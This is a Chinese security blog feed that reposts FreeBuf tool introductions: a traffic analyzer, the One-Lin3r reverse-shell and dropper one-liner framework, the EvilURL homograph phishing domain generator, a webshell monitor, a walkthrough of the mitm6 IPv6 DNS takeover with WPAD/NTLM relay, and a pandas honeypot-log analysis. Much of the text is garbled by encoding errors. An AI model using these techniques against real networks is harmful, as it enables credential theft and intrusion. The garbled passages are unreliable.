阿峰博客 阿峰'S blog http://www.aycelz.tw 专注于网络安全,漏洞挖掘,攻防研究,安全博客 Wed, 07 Feb 2018 02:46:39 +0000 zh-CN hourly 1 https://wordpress.org/?v=4.9.3 Joy:一款用于捕获和分析网络内部流量数据的工具 http://www.aycelz.tw/1282.html http://www.aycelz.tw/1282.html#respond Wed, 07 Feb 2018 02:46:39 +0000 http://www.aycelz.tw/1282.html

今天给大家介绍的是一款名叫Joy的工具,该工具能够捕捉并分析网络流数据以及系统内部流数据,研究人员可以利用这些数据以及分析结果来进行网络研究、取证以及安全监控等活动。

Joy:一款用于捕获和分析网络内部流量数据的工具

工具下载

下载地址:【GitHub传送门

工具介绍

Joy是一款基于BSD许可证协议下的软件数据包(基于libpcap),它可以从实时网络流量中提取数据或直接捕捉到数据包文件(pcap文件)。Joy使用的是一种指向数据流的模型,其工作机制跟IPFIX或Netflow有些类似,在捕捉到数据之后,Joy将以JSON格式呈现出这些数据。除此之外,Joy还包含了分析工具,用户可以直接使用这些分析工具来对数据文件进行分析。值得一提的是,Joy可以用来进行大规模数据提取,尤其是那些跟网络安全以及恶意威胁相关的数据。

之所以这里要使用JSON,主要是为了方便将捕捉到的数据直接输入到数据分析工具之中以进行深入分析。虽然JSON输出文件稍微有些冗长,但是文件大小还是比较小的,而且可压缩性也很强。

经过配置后,Joy还可以获取系统内部流数据,即网络流内部所发生的事件信息以及各种数据,其中包括:

1.   IP数据包的长度以及到达时间;

2.   数据流中特定数据的经验概率分布情况,以及相应的熵;

3.   TLS记录的长度以及到达时间;

4.   其他非?#29992;?#30340;TLS数据,例如提供的?#29992;?#22871;件列表、选择的?#29992;?#22871;件、clientKeyExchange域的长?#21462;?#20197;及服务器证书?#22336;?#20018;等等;

5.   DNS域名、地址以及TTLs;

6.   HTTP头元素以及HTTP body的前八个字节;

7.   跟数据流有关的进程名称以及pcap文件;

适用范围

Joy不仅适用于信息安全研究和取证,而?#19968;?#21487;以对小型网络进行监控以检测安全漏洞、网络威胁、以及未授权的非法操作。研究人员、网络管理员、渗透测试人员和安全响应团队都可以利用Joy提供的数据来监控和保护自家网络的安全。当然了,对于攻击者来说,Joy同样可以帮助他们实现自己的目的,例如扫描目标网络中潜在的安全漏洞,或者窃取目标网络流数据。因此,我们建议大家在没有得?#21483;?#21487;的情况下不要将该工具应用到其他个人或组织网络中。

版本介绍

目前发布的Joy仍是测试版本,我们希望有能力的同学可以在工具的使用过程中给我们提交反馈意见或更新功能代码【GitHub】。在接下来的一两周时间里,我们将会发布Joy 2.0版本,在新版本中我们对JSON模式进行了大幅度修?#27169;?#24182;添加了很多新的功能,敬请期待。

使用Tip

Joy可以在Linux(Debian, Ubuntu, CentOS和Raspbian)、macOS以及Windows平台上正常运行。该工具使用了gcc编译,并且能够适用于多种开发环境。

工具配置及依赖组件

下载Joy源代码:

git clone https://github.com/cisco/joy.git cd joy

Linux(Ubuntu)

sudo apt-get install build-essential libssl-dev libpcap-dev libcurl4-openssl-dev

Windows

嵌入到windows/子目录中。

macOS

在构建Joy之前,你需要安装OpenSSL开发组件,你可以运行下列命令来查看当前的OpenSSL版本信息:

openssl version

从openssl.org下载符合条件的文件包,并提取出来。

MacOS Sierra native OpenSSL 0.9.8zh:【下载地址

curl -o openssl-0.9.8zh.tar.gz https://www.openssl.org/source/old/0.9.x/openssl-0.9.8zh.tar.gz

下载好OpenSSL tarball之后,你还需要提取并运行配置脚本:

tar zxf openssl-0.9.8zh.tar.gz cd openssl-0.9.8zh ./config

详细的工具配置文档请参考【构建指引】。

* 参考来源:joy,FB小编Alpha_h4ck编译,转载于FreeBuf

]]>
http://www.aycelz.tw/1282.html/feed 0
One-Lin3r:懒人的福音,渗透测试单行化工具 http://www.aycelz.tw/1277.html http://www.aycelz.tw/1277.html#respond Thu, 01 Feb 2018 02:38:50 +0000 http://www.aycelz.tw/1277.html

今天给大家介绍一款名叫One-Lin3r的渗透测试工具工具,这款工具可谓是“懒人”的福音,因为只需要输入一行命令,它就可以帮助我们完成渗透测试任务。

One-Lin3r:懒人的福音,渗透测试单行化工具

One-Lin3r

One-Lin3r是一款简单的轻量级框架,而该工具的灵感来自于Metasploit的web-delivery模块。该工具提供了多种命令,例如:

1.   Reverser:提供IP及端口号,它将返回一个可直接使用的反向Shell;

2.   Dropper:提供上传后们的URL地址,它将返回一个可操作的命令行;

功能介绍

1.   可通过全名或关键?#35797;?#25968;据库中搜索one-liner命令;

2.   你可以通过.liner文件来创建自己的one-liner。除此之外,你还可以直接将文件发?#36879;?#20854;他用户并添加到框架中直接使用;

3.   自动补全框架命令,并给出命令推荐;

4.   框架可使用命令行参数来实现命令的自动化加载和执行;

5.   如果在没有重启框架的情况下添加one-liner的话,可以通过重?#24405;?#36733;数据库来使用新添加的one-liner;

6.   在Payload文件夹中创建一个.liner文件后,就可以向Payload数据库中添?#23588;?#24847;平台了;

Payload数据库目前还不算非常大,因为该工具只是第一个版本,但是随着代码的更新以及社区的贡献,数据库将会变得越来越大。

下载地址

GitHub传送门

演示视频

视频地址:

看不到?点这里

工具使用

命令行参数:

usage:One-Lin3r.py [-h] [-r R] [-x X] [-q]   optionalarguments:   -h, --help show this help message and exit   -r         Execute a resource file (history file).   -x         Execute a specific command (use ; for multiples).   -q         Quit mode (no banner).

框架命令:

Command             Description --------            ------------- help/?              Show this help menu list/show           List payloads you can use in theattack. search  <Keyword>   Search payloads for a specific one use     <payload>   Use an available payload info    <payload>   Get information about an available payload banner              Display banner reload/refresh      Reload the payloads database check               Prints the core version anddatabase version then check for them online. history             Display command line mostimportant history from the beginning save_history        Save command line history to a file exit/quit           Exit the framework

工具安装及要求

为了保证该工具能够正常运行,用户需满足以下条件:

Python3.x 或2.x (最好是3)

Linux(已在Kali Linux下测试成功)或Windows系统(还未在macOS平台上进行过测试,但理论上是可以正常运行的)

工具安装

针对Windows平台:(下载ZIP文件并解压缩)

cd One-Lin3r-master python-m pip install -r win_requirements.txt python One-Lin3r.py -h

针对Linux平台:

git clone https://github.com/D4Vinci/One-Lin3r.git chmod 777 -R One-Lin3r cd One-Lin3r pip install -r requirements.txt python One-Lin3r.py -h

工具运行截图

One-Lin3r:懒人的福音,渗透测试单行化工具

One-Lin3r:懒人的福音,渗透测试单行化工具

One-Lin3r:懒人的福音,渗透测试单行化工具

One-Lin3r:懒人的福音,渗透测试单行化工具

* 参考来源:github,FB小编Alpha_h4ck编译,转载于FreeBuf

]]>
http://www.aycelz.tw/1277.html/feed 0
EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具 http://www.aycelz.tw/1273.html http://www.aycelz.tw/1273.html#respond Wed, 31 Jan 2018 23:37:56 +0000 http://www.aycelz.tw/1273.html

EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具

EvilURL v2.0是一个IDN同?#25105;?#20041;字攻击(Homograph Attack )的unicode恶意域名生成器。同时,它?#37096;?#34987;用于检测这些域名的真实性。

安装环境

python 3.x

测试版本

Kali Linux – ROLLING EDITION

CLONE

git clone https://github.com/UndeadSec/EvilURL.git

运行

cd EvilURL python3 evilurl.py

截图

EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具

日志更新

完整的脚本更新到Python 3.x {关闭对Python 2.x支持}

CheckURL模块。{增加URL或连接网址的恶意识别功能。}

更好的交互性。 {更好的界面和设计。}

VIDEO DEMO

*参考来源:github,FB小编 secist 编译,转载于FreeBuf

]]>
http://www.aycelz.tw/1273.html/feed 0
国产网站恶意代码监测(网马监控)工具优化版 http://www.aycelz.tw/1265.html http://www.aycelz.tw/1265.html#respond Sun, 21 Jan 2018 23:24:11 +0000 http://www.aycelz.tw/1265.html 好久没写东西了,十九大要召开了,忙坏了我们这群做安全的小屌丝们~国庆也没放假,哎~说正题吧,很久之前发过一次这个工具,只?#36824;?#26377;很多问题,监控效率也不高,这次优化了下。

新版本:

①提升了监控到网马后的处理速度,优化了高频率上传的处理速度,10文件同时上传,1秒内处理完毕。

②增加了简易的日志功能(为什?#27492;?#26159;简易呢,看后面图片就知道了)

③增加了一批样本,新增加?#36865;?#22810;样本的(懒得数了,反正挺多的)

④优化了关闭或使用ALT+F4时,程序会自动最小化到任务?#31119;?#36991;免误操作关闭该软件;

⑤新增加了敏感关键字检测,当监测到页面出现敏感关键字时,会将页面进行隔离处理,确保敏感页面不对外展示;

https://github.com/wstart/webshell

https://github.com/ysrc/webshell-sample

不算之前收录的内容,上述链接中所涉及的样本,收录了90%,还有一部分PHP的未收录,我找时间看吧,还未验证是否能监控到。

昨天增加了中文敏感词汇的特征,我的软件不可能涵盖所有的webshell特征,这个是肯定的,我也不敢吹这个牛,增加中文敏感词汇的意义,是在于如果有webshell未被检测到,至少页面不会被改成这样涉及敏感问题的页面,毕竟服务器被破坏了,也比被弄成乱七八糟的页面要好的多,政?#26410;?#35823;,你懂的。

今天又对软件进行了创建、修改、删除、重命名4种操作方式的压力测试,写了个批处理文件,循环进行操作,模拟大量写入和操作的过程,来测试软件的压力,调整了一天代码,总算是完工了。

先贴出涉及敏感词汇的特征吧~~~只添加了一些,慢慢增加吧。

国产网站恶意代码监测(网马监控)工具优化版

其实?#19968;?#24456;小,我根本不懂上面的词是什么意思(手动捂脸~~~)

功能?#24471;?#25130;图:

国产网站恶意代码监测(网马监控)工具优化版

国产网站恶意代码监测(网马监控)工具优化版

软件开始执行时是这个样子的

国产网站恶意代码监测(网马监控)工具优化版

隔离区放在了C:/temp/geliqu目录下

日?#25964;?#20648;在c:/temp目录下

一目了然。

国产网站恶意代码监测(网马监控)工具优化版

使用演示视频:

这就是我说的简易日志的原因了,因为真的很简易,其实想弄报表的,但是最近忙的要死,都是加完班以后,半夜扣1个小时代码

同事?#19988;卜从?#20102;下,UI界面实在丑的令人扎?#27169;?#25105;看着也扎?#27169;?#31561;有时间给它整整容吧,先看实用性吧,东西好用了,丑不丑也就无所谓了,对吧?

链接: https://pan.baidu.com/s/1o84zD7G 密码: hs2w

?#38431;?#22823;家测试,有监控不到的webshell或者bug问题,?#38431;?#31449;内信反馈!

等忙完这段时间,把Python版的给大家发出来。(反正python版的主要用在非windows平台,丑不丑你?#19988;部?#19981;出来。)

*本文作者:鬼魅羊羔,转载于 FreeBuf

]]>
http://www.aycelz.tw/1265.html/feed 0
MITM6:用IPv6攻陷IPv4网络的工具 http://www.aycelz.tw/1263.html http://www.aycelz.tw/1263.html#respond Fri, 19 Jan 2018 02:21:37 +0000 http://www.aycelz.tw/1263.html

随着IPv6概念的提出,互联网上针对IPv6协议的使用也日渐增多,但即便如此IPv6在公司内部却并不受?#38431;?#24456;少会有公司使用IPv6。然而,大多数公?#31350;?#33021;都忽略了一个问题,虽然IPv6可能没有被我们主动启用,但自Windows Vista以来的所有Windows版本(包括服务器版本)都默认启用了IPv6,并且优先级高于IPv4。

在本篇博文中,我将为大家介绍一种针对IPv6的攻击:即利用Windows网络中的默认IPv6配置,伪装DNS服务器来欺骗DNS reply,并将流量重定向到攻击者指定的?#35828;恪?#25509;着,?#19968;够?#20026;大家提供一?#20013;?#30340;利用(臭名昭着的)Windows代理自动发现(WPAD)功能,来传递凭证并对网络中的各?#22336;?#21153;进行身份验证的 方法。Fox-IT在GitHub上创建了该工具并命名为mitm6,大家可以在这里下载到。

IPv6攻击

与IPv6的发展速?#28982;?#24930;一样,网上关于针对IPv6渗透测试的资料也少的可怜。尽管市面上有不少相关书籍?#25429;?#25110;多或少的提到了诸如ARP欺骗之类的东西,但却很少涉及IPv6,而可用于测试或利用IPv6配置的工具则更稀缺。这里我要提及的一款工具是THC IPV6攻击套件,这也是mitm6灵感的来源。本文中描述的攻击是SLAAC攻击其中的一个版本,最早是由Infosec研究所的Alex Waters在2011年提出的。SLAAC攻击通过建立一个流氓IPv6路由器,并设置各?#22336;?#21153;对网络中的所有流量实施中间人攻击。之后,Neohapsis为这种攻击开发了一个自动化工具名为suddensix

对于SLAAC攻击也有其弊端,由于SLAAC攻击会尝试在现有的IPv4网络为当前所有设备创建一个覆盖网络。而在这渗透测试中并不是一个理想的情况,因为这么做会导致网络稳定性受到明显的影响。?#36865;猓?#25915;击者还需借助相当多外部的软件包和服务才能正常执行攻击操作。mitm6专注于更快更好的解决方?#31119;?#27979;试人员可以根据需求选择攻击主机和欺骗DNS reply,同时能最大限度的减少对网络正常运行带来的影响。而且mitm6使用起来也非常简单,几乎不需要进行配置,并可在?#35813;?#20869;执行攻击。当攻击任务完成后,则会根据工具中默认设置的超时时间,在较短时间内将网络?#25351;?#21040;之前的状态。

mitm6攻击

攻击阶段1 – 主DNS接管

首先让mitm6开始在攻击者机器的主接口上侦听,并通过DHCPv6向 Windows客户端请求IPv6配置。默认情况下,自Windows Vista之后,每台Windows计算机都会定期向该配置发起请求。我们可以通过Wireshark抓包来进行查看:

MITM6:用IPv6攻陷IPv4网络的工具

mitm6将会应答这些DHCPv6请求,并为受害者分配本地链路范围内的IPv6地址。而在实际的IPv6网络中,这些地址由主机本身自动分配,不需要由DHCP服务器来配置,这使得我们有机会将攻击者IP设置为受害者的默认IPv6 DNS服务器。需要注意的是,mitm6目前只针对基于Windows的操作系统,因为像macOS和Linux等其他操作系统,不使用DHCPv6来分配DNS服务器。

mitm6不会对外宣称自己是网关,因此主机不会尝试与本地网段或VLAN之外的IPv6主机进行通信。mitm6也不会尝试对网络中所有流量的中间人,而是选择性地欺骗主机(在运行mitm6时可以指定过滤的域),这样做也减少了对网络造成的影响。

以下截图显示了mitm6的攻击过程。该工具自动检测攻击者计算机的IP配置,并以包含攻击者IP作为DNS服务器的DHCPv6应答回复网络中客户端发送的DHCPv6请求。它将周期性的发送通告路由器(RA)消息来提醒客户端存在IPv6网络,并且客户端应该通过DHCPv6请求IPv6地址。这在某些情况下会加快攻击速度,但这并不是必须要做的工作,我们可以在具有SLAAC攻击防护的网络?#29616;?#34892;此攻击。

MITM6:用IPv6攻陷IPv4网络的工具

攻击阶段2 – DNS欺骗

在受害者机器?#24076;?#25105;?#24378;?#21040;我们的服务器被配置为了DNS服务器。由于Windows对IP协议的偏好,IPv6 DNS服务器将优于IPv4 DNS服务器。IPv6 DNS服务器将会 被用于查询A(IPv4)和AAAA(IPv6)记录。

MITM6:用IPv6攻陷IPv4网络的工具

接着我们要做的是让客户端连接到攻击者机器,我们的最终目标是让用户或浏览器自动向攻击者机器进行身份验证,这就是为什么我们要欺骗内部域testsegment.local中URL的原因。在步骤1的截图中你可以看到,客户端在分配了IPv6地址后立即开?#35760;?#27714;有关wpad.testsegment.local的信息。这是我们在这次攻击当中将要利用的一部分。

WPAD利用

WPAD利用的简短史

Windows代理自动检测功能一直以来?#21363;?#22312;着巨大争议,而且多年来一直被渗透测试人员所利用。它本意的用途是用于在企业环境中自动检测用于连接到互联网的网络代理。历史?#24076;?#25552;供wpad.dat文件的服务器地址(提供这些信息)将使用DNS解析,如果没有条目返回,地址将通过不安全的广播协议解析,如链路本地多播名称解析 (LLMNR)。攻击者可以回复这些广播名称解析协议并对其进行欺骗,让其认为WPAD文件位于攻击者服务器?#24076;?#28982;后提示进行身份验证以访问WPAD文件。这种认证是Windows默认提供的,无需用户交互。这将会向攻击者提供登录在该计算机上的用户的NTLM凭据,可被用于在NTLM中继的过程中对服务进行认证。

然而在2016年微软发布了安全公告MS16-077,通过增加?#36739;?#37325;要的保护措施来缓解这一攻击:

WPAD文件的位置不再需要通过广播协议请求,而只能通过DNS;

即使服务器请求,也不会自动进行认证。

虽然在网络中,我们仍能碰到一些未完全修复的机器仍在通过LLMNR请求WPAD并自动进行认证,但我?#19988;?#21457;现越来越多的公?#31350;?#22987;开始注意到了这点并进行了很好的改善。

MS16-077之WPAD的利用

针对微软的第一个安全措施仅通过DNS,mitm6可以帮助我们轻松绕过。一旦受害者机器将攻击者设置为IPv6 DNS服务器,它将开始查询网络的WPAD配置。由于这些DNS查询被发?#36879;?#20102;攻击者,它只能用自己的IP地址(是IPv4或IPv6取决于受害者机器请求的是什么)进行回复。

要想绕过第二个防护,我们需要做一些更复杂的操作。当受害者请求一个WPAD文件时,我们将不会请求验证,而是提供一个攻击者机器上设置作为代理的?#34892;?#30340;WPAD文件。此时,当受害者运行任何使用Windows API连接到互联网的应用程序或是浏览网?#24120;?#37117;将使用攻击者机器作为代理。这在Edge,Internet Explorer,Firefox和Chrome中都可以使用,因为默认情况下它们都遵循WPAD系统设置。

现在当受害者连接到我们的代理服务器,我们可以通过CONNECT HTTP或GET后的完整URI识别,我们使用HTTP 407代理身份验证进行回复。这与通常用于请求验证的HTTP代码HTTP 401不同。

IE/Edge和Chrome(使用IE设置)将自动向代理进行身份验证,即使在最新的Windows版本上也是如此。在Firefox中,可以对该配置进行设置,默认情况下是启用状态。

MITM6:用IPv6攻陷IPv4网络的工具

此时,Windows将会毫无防备的将NTLM challenge/response发?#36879;?#25915;击者,攻击者可以将其转发给不同的服务。通过这种中继攻击,攻击者可以对服务进行身份验证,访问网站和共享信息,如果受害者的权限足够大,攻击者甚?#37327;?#20197;在计算机?#29616;?#34892;代码,并接管整个Windows域。关于NTLM中继的相关内容,在我之前的博文中有过介,点击这里查看

完整的攻击

在前面的几节内容我对该类攻击做了一个大致的描述和解释。执行此攻击本身非常简单。首先我们启动mitm6,它将开始中继DHCPv6请求,然后开始在内?#23458;?#32476;中向DNS查询请求名称。在攻击的第二部分,我们将使用到中继工具ntlmrelayx。这个工具是Core Security impacket Python库的一部分,是smbrelayx工具的一个改进版支持多种协议。Core Security和Fox-IT最近共同改进了ntlmrelayx,增加了几项新功能(其中包括)使其能够通过IPv6进行中继,提供WPAD文件,自动检测代理请求并提示受害者进行正确的身份验证。如果你想进一步的了解这些新功能,请点击relay-experimental分支查看。

要提供WPAD文件,我们需要在命令提示符中-wh参数后添加主机,并指定WPAD文件所在的主机。由于mitm6让我们可以控制DNS,因此受害网络中的任何不存在的主机名都可以执行。为了确保ntlmrelayx在IPv4和IPv6上侦听,我们可以使用-6参数。以下截图为我们展示了两个工具当前的运行情况,显示了两个工具正在运行,mitm6有选择地欺骗DNS回复,ntlmrelayx服务于WPAD文件,然后将身份验证转发到网络中的其它服务器。

MITM6:用IPv6攻陷IPv4网络的工具

MITM6:用IPv6攻陷IPv4网络的工具

防御和解决方案

对于上述的这类攻击,目前唯一的解决办法是禁用IPv6。这将阻止Windows客户端DHCPv6服务器查询,并使攻击者无法通过上述方法接管DNS服务器。

对于WPAD漏洞,最好的解决方案是通过组策?#36234;?#29992;代理自动检测功能。如果您的公司内部使用代理配置文件(PAC文件),建议显式配置PAC网址,而不是依靠WPAD自动检测。

在写这篇博文时,Google的Project Zero团队也发现了WPAD中的漏洞,其博文中提到禁用WinHttpAutoProxySvc是禁用WPAD的唯一可靠方式。

最后,阻止NTLM中继的唯一完整解决方案是完全禁用它并切换到Kerberos。更多关于NTLM中继攻击的解决方案可以参考我们之前的博文。

工具获取

文中提及的相关工具可在Fox-IT GitHubimpacket repository获取。

*参考来源:fox-it,FB小编 secist 编译,转载于FreeBuf

]]>
http://www.aycelz.tw/1263.html/feed 0
Python工具分析风险数据 http://www.aycelz.tw/1261.html http://www.aycelz.tw/1261.html#respond Mon, 15 Jan 2018 00:19:47 +0000 http://www.aycelz.tw/1261.html

小安前言

随着网络安全信息数据大规模的增长,应用数据分析?#38469;?#36827;行网络安全分析成为?#21040;?#30740;究热点,小安在这次小讲堂中带大家用Python工具对风险数据作简单分析,主要是分析蜜罐日志数据,来看看一般大家都使用代理ip干了一些啥事。

Python工具分析风险数据

大家可能会问小安啥是蜜罐,网上一些黑客或?#38469;?#20154;员经常做一些"事情"的时候,需要隐藏自己身份,这样他们会使用代理IP来办事。而蜜罐(Honeypot)是一?#20013;?#22411;的主动防御的安全?#38469;酰?#23427;是一个专门为了被攻击或入侵而设置的欺骗系统——既可以用于保护产品系统,又可用于搜集黑客信息,是一种配置灵活、形式多样的网络安全?#38469;酢?/p>

说得通俗一点就是提供大量代理IP,引诱一些不法分子来使用代理这些代理ip,从而搜集他们的信息。

数据分析工具介绍

工欲善其事,必先利其器,在此小安向大家介绍一些Python数据分析的?#21543;?#20853;利器?#21834;?/p>

Python中著名的数据分析库Panda

Pandas库是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建,也是围绕着 Series 和 DataFrame 两个核心数据结构展开的,其中Series 和 DataFrame 分别对应于一维的序列和二维的表结构。

Pandas提供了大量能使我?#24378;?#36895;便捷地处理数据的函数和方法。这个库优点很多,简单易用,接口抽象得非常好,而且文档支持实在感人。你很快就会发现,它是使Python成为强大而高效的数据分析环境的重要因素之一。

数据可视化采用Python上最常用的Matplotlib库

Matplotlib是一个Python的图形框架,也是Python最著名的绘图库,它提供了一整套和Matlab相似的命令API,十分适合交互式地进行制图。

我们有了这些?#21543;?#20853;利器“在手,下面小安将带大家用Python这些工具对蜜罐代理数据作一个走马观花式的分析介绍。

1 引入工具–加载数据分析包

启动IPython notebook,加载运行环?#24120;?/p>

%matplotlib inlineimport pandas as pdfrom datetime import timedelta, datetimeimport matplotlib.pyplot as pltimport numpy as np

2 数据准备

俗?#20843;? 巧妇难为无米之炊。小安分析的数据主要是用户使用代理IP访问日志记录信息,要分析的原始数据以CSV的形式存储。这里首先要介绍到pandas.read_csv这个常用的方法,它将数据读入DataFrame。

analysis_data = pd.read_csv('./honeypot_data.csv') 

对的, 一行代码就可以将全部数据读到一个二维的表结构DataFrame变量,感觉很简单有木有啊!!!当然了用Pandas提供的IO工具你?#37096;?#20197;将大文件分块读取,再此小安测试了一下性能,完整加载约21530000万条数据也大概只需要90秒左右,性能还是相当不错。

3 数据管窥

一般来讲,分析数据之前我们首先要对数据有一个大体上的了解,比如数据总量有多少,数据有哪些变量,数据变量的分布情况,数据重复情况,数据缺失情况,数据中异常值初步观测等?#21462;?#19979;面小安带小伙伴们一起来管窥管窥这些数据。

使用shape方法查看数据行数及列数

analysis_data.shape

Out: (21524530, 22) #这是有22个维度,?#24067;?1524530条数据记的DataFrame

使用head()方法默认查看前5行数据,另外还有tail()方法是默认查看后5行,当然可以输入参数来查看自定义行数

analysis_data.head(10) 

Python工具分析风险数据

这里可以了解到我们数据记录有用户使用代理IP日期,代理header信息,代理访问域名,代理方法,源ip以及蜜罐节点信息等?#21462;?#22312;此小安一定一定要告诉你,小安?#30475;?#20570;数据分析时必定使用的方法–describe方法。pandas的describe()函数能对数据进行快速统计汇总:

对于数值类型数据,它会计算出每个变量:

总个数,平均值,最大值,最小值,标准差,50%分位数等等;

非数值类型数据,该方法会给出变量的:

?#24378;?#20540;数量、unique数量(等同于数据库中distinct方法)、最大频数变量和最大频数。

由head()方法我们可以发现数据中包含了数值变量、非数值变量,我们首先可以利用dtypes方法查看DataFrame中各列的数据类型,用select_dtypes方法将数据按数据类型进行分类。然后,利用describe方法返回的统计值对数据有个初步的了解:

df.select_dtypes(include=['O']).describe() 

Python工具分析风险数据

df.select_dtypes(include=['float64']).describe()
proxy_retlength scan_os_fp scan_os_sub_fp scan_scan_mode dtype_details
count 6.417354e+06 0.0 0.0 0.0
mean 1.671744e+03 NaN NaN NaN
std 3.104775e+04 NaN NaN NaN
min 0.000000e+00 NaN NaN NaN
25% NaN NaN NaN NaN
50% NaN NaN NaN NaN
75% NaN NaN NaN NaN
max 2.829355e+07 NaN NaN NaN

简单的观察上面变量每一维度统计结果,我们可以了解到大?#19968;?#21462;代理数据的长度平均1670个字节左右。同时,也能发现字段scan_os_sub_fp,scan_scan_mode等存在空值等等信息。这样我们能对数据整体上有了一个大概了解。

4 数据清洗

由于源数据通常包含一些空值甚?#37327;?#21015;,会影响数据分析的时间和效率,在预览了数据摘要后,需要对这些无效数据进行处理。

一般来说,移除一些空值数据可以使用dropna方法, 当你使用该方法后,检查时发现 dropna() 之后几乎移除了所?#34892;?#30340;数据,一查Pandas用户手册,原来不加参数的情况下, dropna() 会移除所有包含空值的行。 

如果你只想移除全部为空值的列,需要加上 axis 和 how 两个参数:

analysis_data.dropna(axis=1, how='all')

另外,?#37096;?#20197;通过dropna的参数subset移除指定列为空的数据,和设置thresh值取移除每非None数据个数小于thresh的行。

analysis_data.dropna(subset=['proxy_host', 'srcip'])

#移除proxy_host字段或srcip字段没有值的行

analysis_data.dropna(thresh=10)

#移除所?#34892;?#23383;段中有值属性小于10的行

5 统计分析

再对数据中的一些信息有了初步了解过后,原始数据有22个变量。从分析目的出发,我将从原始数据中挑选出局部变量进行分析。这里就要给大家介绍pandas的数据切片方法loc。

loc([start_row_index:end_row_index,[‘timestampe’, ‘proxy_host’, ‘srcip’]])是pandas重要的切片方法,逗号前面是对行进行切片?#27426;?#21495;后的为列切片,也就是挑选要分析的变量。

如下,我这里选出日期,host和源IP字段——

analysis_data = analysis_data.loc([:, [‘timestampe’,'proxy_host','srcip']])

首先让我们来看看蜜罐代理每日使用数据量,我们将数据按日统计,了解每日数据量PV,并将结果画出趋势图。

daily_proxy_data = analysis_data[analysis_data.module=='proxy']daily_proxy_visited_count = daily_proxy_data.timestamp.value_counts().sort_index()daily_proxy_visited_count.plot()

Python工具分析风险数据

对数据列的丢弃,除无效值和需求规定之外,一些表自身的冗余列也需要在这个?#26041;?#28165;理,比如说DataFrame中的index号、类型描述等,通过对这些数据的丢弃,从而生成新的数据,能使数据容量得?#25509;行?#30340;缩减,进而提高计算效率。

由上图分析可知蜜罐代理使用量在6月5号,19-22号和25号这几天?#26102;?#28856;式增长。那么这几天数据有情况,不正常,具体是神马情况,不?#20445;?#21518;面小安带大家一起来慢慢揪出来到底是那些人(源ip) 干了什么“坏事”。

进一步分析, 数据有异常后,再让我们来看看每天去重IP数据后量及其增长量。可以按天groupby后通过nunique()方法直接算出来每日去重IP数据量。

daily_proxy_data = analysis_data[analysis_data.module=='proxy']daily_proxy_visited_count = daily_proxy_data.groupby(['proxy_host']).srcip.nunique()daily_proxy_visited_count.plot()

Python工具分析风险数据

究竟大部分人(源ip)在干神马?干神马?干神马?让我们来看看?#29615;?#38382;次数最多host的哪些,即同一个host关联的IP个数,为了方便我们只查看前10名热门host。

先选出host和ip字段,能过groupby方法来group 每个域名(host),再对每个域名的ip访问里unique统计。

host_associate_ip = proxy_data.loc[:, ['proxy_host', 'srcip']]grouped_host_ip = host_associate_ip.groupby(['proxy_host']).srcip.nunique()print(grouped_host_ip.sort_values(ascending=False).head(10))

代理访问host 源ip
www.gan**.com 1113
wap.gan**.com 913
webim.gan**.com 710
cgi.**.qq.com 621
www.baidu.com 615
loc.***.baidu.com 543
baidu.com 515
www.google.com 455
www.bing.com 428
12**.ip138.com 405

再细细去看大家到底做了啥——查看日志数据发现原来在收集像二手?#23548;?#26684;,工人招聘等等信息。从热门host来看,总得来说大家使用代理主要还是获取百度,qq,Google,Bing这类妇孺皆知网站的信息。

下面再让我们来看看是谁用代理IP?#26696;?#20107;”最多,也就是看?#27492;?#30340;IP访问不同host的个数最多。

host_associate_ip = proxy_data.loc[:, ['proxy_host', 'srcip']]grouped_host_ip = host_associate_ip.groupby(['srcip'_host']).proxy_host.nunique()print(grouped_host_ip.sort_values(ascending=False).head(10))
源ip 访问不同host个数
123.**.***.155 2850
64.**.**.122 2191
124.***.***.103 710
212.*.***.14 562
124.***.***.126 518
195.***.**.1 465
27.***.***.202 452
90.**.***.11 451
212.*.***.13 438
110.***.***.39 430

哦,发现目标IP为123.**.***.155的小伙子有大量访问记录, 进而查看日志,原来他在大量收集?#39057;?#20449;息。 好了,这样我们就大概能知道谁在干什么了,再让我们来看?#27492;?#20204;使用proxy?#20013;?#26102;长,谁在长时间里使用proxy。 代码如下——

这里不给大家细说代码了,只给出如下伪代码。

date_ip = analysis_data.loc[:,['timestamp','srcip']]grouped_date_ip = date_ip.groupby(['timestamp', 'srcip'])#计算每个源ip(srcip)的访问日期all_srcip_duration_times = ...#算出最长连续日期天数duration_date_cnt =  count_date(all_srcip_duration_times)

源ip ?#20013;?#26085;期(天)
80.**.**.38 32
213.***.**.128 31
125.**.***.161 22
120.**.***.161 22
50.***.**.67 19
114.***.***.97 19
162.***.**.113 19
192.***.**.226 17
182.**.**.205 17
112.***.**.108 16
123.**.***.130 16
61.***.***.156 15
61.***.***.152 15
58.***.***.130 15
216.***.**.106 14
101.***.***.117 14
124.***.***.126 14
79.***.**.254 13
115.**.***.130 13
61.***.***.79 13

好了,到此我也?#32479;?#30053;的知道那些人做什么,谁用代理时长最长等等问题额。取出ip = 80.**.**.38的用户使用代理ip访问数据日志,发现原来这个小伙子在长时间获取搜狐images。

蜜罐在全国各地部署多个节点,再让我们来看看每个源ip扫描蜜罐节点总个数,了解IP扫描节点覆盖率。结果见如下:

# 每个IP扫描的IP扫描节点总个数

node = df[df.module=='scan']node = node.loc[:,['srcip','origin_details']]grouped_node_count = node.groupby(['srcip']).count()print grouped_node_count.sort_values(['origin_details'], ascending=False).head(10)

源ip IP扫描节点总个数
106.***.**.161 9
45.**.**.214 9
94.***.**.174 8
119.**.**.216 7
61.***.***.222 7
182.**.**.205 6
182.**.***.75 6
42.**.***.89 6
123.**.**.64 6
42.**.***.128 6
42.**.***.106 6
42.**.***.82 6
114.***.***.157 6
80.**.**.38 6
42.**.***.149 6
115.**.**.163 6

由上述两表初步可知,一些结论:如源ip为182.**.**.205的用户长时间对蜜罐节点进行扫描,mark危险用户等?#21462;?/p>

*本文作者:岂安科技,转载于FreeBuf

]]>
http://www.aycelz.tw/1261.html/feed 0
批量Webshell管理工具QuasiBot之后门代码分析 http://www.aycelz.tw/1259.html http://www.aycelz.tw/1259.html#respond Fri, 12 Jan 2018 00:15:27 +0000 http://www.aycelz.tw/1259.html ??免责声明:本文介绍的安全工具及方法仅用于渗透测试及安全教学使用,禁止任何非法用途,后果自负??

一、前言

